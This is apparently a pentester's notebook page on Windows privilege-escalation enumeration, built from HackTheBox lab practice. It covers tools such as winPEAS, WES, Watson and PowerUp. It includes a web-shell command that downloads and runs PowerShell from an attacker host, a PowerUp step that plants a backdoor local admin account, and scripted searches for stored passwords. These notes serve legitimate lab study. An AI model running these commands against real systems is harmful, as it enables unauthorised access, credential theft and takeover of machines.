2 Enums

Enumeration:

Check your username and groups:
1. whoami
2. whoami /priv
3. netuser me
winPEAS fast, searchfast, cmd
1. TransferFiles
Seatbelt and other scripts
If scripts fail, run manually
Other Win PrivEsc Cheatsheets:
1. http://www.fuzzysecurity.com/tutorials/16.html --Windows Enums

systeminfo                ..OS build, Proc:x64, OS:x86 - Suggester
hostname
whoami /priv              ..for Token Impersonation (Potato Exploits)
net users
net user Administrator
cmdkey /list              ..look for saved passwords

systeminfo

Find Kernel Exploits with systeminfo and WES
They can cause system-crash
Find matching exploits: google, exploitdb, github
https://github.com/SecWiki/windows-kernel-exploits

cd C:/Windows/Temp
> systeminfo > sys.txt
> copy sys.txt \\10.x.x.x\share\ .

N/A hotfixes?
Confirm here:
dir C:\Windows\SoftwareDistribution\Download    ..prep from wsus
type C:\Windows\WindowsUpdate.log               ..actual update logs

google

whoami
hostname
systeminfo   .. OS, Version, Hotfixes

google: "windows server 2008 6.1.7600 N/A Build 7600 privilege Escalation"
google: "windows 7 enterprise 6.1.7600 priv esc vulnerabilities"

found: 
github/abatchy17/WindowsExploits > 
MS11-046.exe, MS10-059.exe     ..failed
Github/Re4son/chimichurri.exe  ..worked (arctic-htb)
and
MS11-046 (AFD PrivEsc)         ..develHTB

Tasklist

tasklist /V

Windows Exploit Suggester

Lots of findings.. just have to look through them!
MS10-059 = chimichurri

windows-exploit-suggester.py --database 2019-08-27-mssb.xls --systeminfo sys.txt

WES

curl -k "https://raw.githubusercontent.com/bitsadmin/wesng/master/wes.py" > ./wes.py
python3 wes.py --update 
python wes.py /share/systeminfo.txt -i 'Elevation of Privilege' --exploits-only | more
python wes.py ./sys.txt -s critical -i "Remote Code Execution"

WESng

Based on win-ver and patch level
https://github.com/bitsadmin/wesng

> curl -k "https://raw.githubusercontent.com/bitsadmin/wesng/master/wes.py" > ./wes.py
> python3 wes.py --update 
> python wes.py systeminfo.txt -i 'Elevation of Privilege' --exploits-only
> python ./wes.py ~/htb/arctic/systeminfo.txt -i 'Elevation of Privilege' --exploits-only

Kernel Exploits

Compare to 'systeminfo' report
https://github.com/SecWiki/windows-kernel-exploits
https://github.com/rasta-mouse/Watson ..for recent windows
USE: WinKernelExploits

Check Perms

accesschk.exe /accepteula -wvu "C:\Program Files\Autorun Program\program.exe" 
accesschk.exe /accepteula -quv user CleanUp.ps1

User whoami privs

Privs give yours special rights

whoami /priv

Note: if listed you have it! even if it says 'disabled' you still have it!

SeImpersonatePrivilege Allows impersonate Ex: Juicy Potato\
SeAssignPrimaryPrivilege Similar. Enables user to assign access token to new proc. Ex: Juicy Potato
SeBackupPrivilege Grants read access to ALL objects Could find sensitive files/hashes/registry\
SeRestorePrivilege Grants write to all objects overwrite binaries/dlls/registry\
SeTakeOwnerPrivilege Can take ownership and write overwrite binaries/dlls/registry\
Advanced: SeTcbPrivilege SeCreateTokenPrivilege SeLoadDriverPrivilege SeDebugPrivilege (used in getsystem)

Windows Service Configuration Viewer

Check for misconfigs in services that can lead to privilege escalation.
You can replace the executable with your own
and have windows execute whatever code you want as the privileged user.

icacls scsiaccess.exe

scsiaccess.exe
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
Everyone:(I)(F)

Watson

Dot Net tool that Finds Missing Patches
https://github.com/rasta-mouse/Watson
Check targets .NET version and Build that Version in VisualStudio

> reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP"
.NET v3.5
Build > Your version: OSx86

\\10.10.14.34\share\Watson.exe
Watson Found 5 Vulns
Including: MS11-046

Sherlock

Example from DrupalPhpVuln

locate Sherlock.ps1
cp Sherlock.ps1 .
dos2unix Sherlock.ps1  ..fixed some bad unicode (at beginning)
vim Sherlock.ps1
Find-AllVulns          ..add as last line

http://10.x.x.x/ippsec.php?fexec=
=echo IES(New-Object Net.WebClient).DownloadString('http://$MyIP:8000/Sherlock.ps1')|powershell -noprofile -

Found: 
MS15-051 ClientCopyImage not-vulnerable (but ippsec disagrees, try this)
MS16-016 WebDAV ..requires 2 processors and race-condition ..lets ignore

UACME

Tries 30+ ways to PrivEsc
"You AC Me Bro"
https://github.com/hfiref0x/UACME

UAC Bypass

User Account Control
Metasploit has 'bypassuac' for Windows7
PowerShell Empire that prompts in a nice way

BeRoot

Check for misconfigs in Win or Linux
C:\Tools\beRoot.exe
Found lots of vulns for PrivEsc

PowerUp Scan

Powershell script to find PrivEsc Vulns and Exploit
PowerShell > PowerShellEmpire > PowerUp.ps1
https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerUp/PowerUp.ps1

locate PowerUp.ps1  (empire)
cp PowerUp.ps1 . 
vim 'Invoke-AllChecks'  ..Add as last line
python -m SimpleHTTPServer

Send to Victim (ex: Drupal)
http://10.x.x.x/ippsec.php?fexec=systeminfo
=echo IES(New-Object Net.WebClient).DownloadString('http://$MyIP:8000/PowerUp.ps1')|powershell -noprofile -

Found a few 'writable directories' for oracle, but nothing great
ex: c:\oracle\ora90\bin
netstat -an     ..3306 mysql, but not oracle (1521)

PowerUp Abuse

Abuse functions ..
- Write-UserAddMSI
- Write-ServiceBinary .. Will create user 'john' with password123 as admin!

locate PowerUp.ps1
cp PowerUp.ps1 .
python -m SimpleHTTPServer        ..Share

Send the file to victim           ..example from Drupal
http://10.x.x.x/ippsec.php?fexec=systeminfo
=echo IES(New-Object Net.WebClient).DownloadString('http://$MyIP:8000/PowerUp.ps1')|powershell -noprofile -

PS> Import-Module .\PowerUp.ps1   ..run as Admin if you can
PS> Invoke-AllChecks              ..Scan

----------------------------------
Found: Unquoted Path:
C:\Program Files\VideoStream\1337 Log\Checklog.exe

Exploit:
Will create a new user 'john' with Password 123! and Local Admin!
(after a reboot/service restart)
PS> Write-ServiceBinary -ServiceName 'Video Stream' -ServicePath ""C:\Program Files\VideoStream\1337.exe""

SharpUp

SharpUp - Good if you dont have PowerShell C# Compiled version: https://github.com/GhostPack/SharpUp https://github.com/r3motecontrol/Ghostpack-CompiledBinaries

win ps or cmd: 
> SharpUp.exe

Seatbelt

Enumeration but doesnt hunt for privesc

GhostPack/Seatbelt https://github.com/GhostPack/Seatbelt https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/ ... Seatbelt.exe

Seatbelt.exe ...help 
Seatbelt.exe all 
Seatbelt.exe NonstandardServices

winPEAS

Hunts for privesc, highlights Most powerful tool in this course! Most maintained tool

carlospolop winPEAS https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS

Enable cmd Colors: reg add HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1

If you cant get colors try running it from kali on reverse-shell

cd:\PrivEsc 
winPEASany.exe -h 
winPEASany.exe                   .. default: all 
winPEASany.exe userinfo
winPEASany.exe quiet procesinfo  .. (yes, misspelled)

accesschk

Older but trustworthy tool to check ACL check access for user/group to file/dir/srv/reg downside: sometimes GUI popup agreement (older vers doesnt)

Quick-Paste-Report

Copy/Paste into your remote Windows shell to generate a quick report:

@echo --------- BASIC WINDOWS RECON --------- > report.txt
timeout 1
net config Workstation >> report.txt
timeout 1
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" >> report.txt
timeout 1
hostname >> report.txt
timeout 1
net users >> report.txt
timeout 1
ipconfig /all >> report.txt
timeout 1
route print >> report.txt
timeout 1
arp -A >> report.txt
timeout 1
netstat -ano >> report.txt
timeout 1
netsh firewall show state >> report.txt
timeout 1
netsh firewall show config >> report.txt
timeout 1
schtasks /query /fo LIST /v >> report.txt
timeout 1
tasklist /SVC >> report.txt
timeout 1
net start >> report.txt
timeout 1
DRIVERQUERY >> report.txt
timeout 1
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated >> report.txt
timeout 1
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated >> report.txt
timeout 1
dir /s *pass* == *cred* == *vnc* == *.config* >> report.txt
timeout 1
findstr /si password *.xml *.ini *.txt >> report.txt
timeout 1
reg query HKLM /f password /t REG_SZ /s >> report.txt
timeout 1
reg query HKCU /f password /t REG_SZ /s >> report.txt
timeout 1
dir "C:\"
timeout 1
dir "C:\Program Files\" >> report.txt
timeout 1
dir "C:\Program Files (x86)\"
timeout 1
dir "C:\Users\"
timeout 1
dir "C:\Users\Public\"
timeout 1
echo REPORT COMPLETE!

Problems

Enums failing?
couldnt get watson or winPEAS.exe to work

.NET might be OLD

Example: 'Granny' had v1.0 .NET


> dir C:\Windows\Microsoft.NET\Framework
> reg query "HKEY_LOCAL_MACHINE\Software\Microsoft\NET Framework Setup\NDP"


Consider trying:
Older version of Watson
https://github.com/rasta-mouse/Watson/tree/486ff207270e4f4cadc94ddebfce1121ae7b5437

---------------------------------
---------------------------------
Use the .bat instead!

C:\Temp>winPEAS.bat
winPEAS.bat

Nothing happened?
Prefixing it with cmd /k worked. 
If you check cmd /?, the /k switch Carries out the command specified by string but remains. 
I suspect cmd /c would work as well but never tried that. 


C:\WINDOWS\Temp\Temp>cmd /k winPEAS.bat > output.txt
cmd /k winPEAS.bat > output.txt

Parsing Mof File: C:\WINDOWS\system32\wbem\Cli.mof(Phase Error - 3)
Compiler returned error 0x80041001
etc...
Ok results, but not great...

More...

Previous1 Windows cmd kungfu Next3 PrivEsc

Last updated 2 years ago

Was this helpful?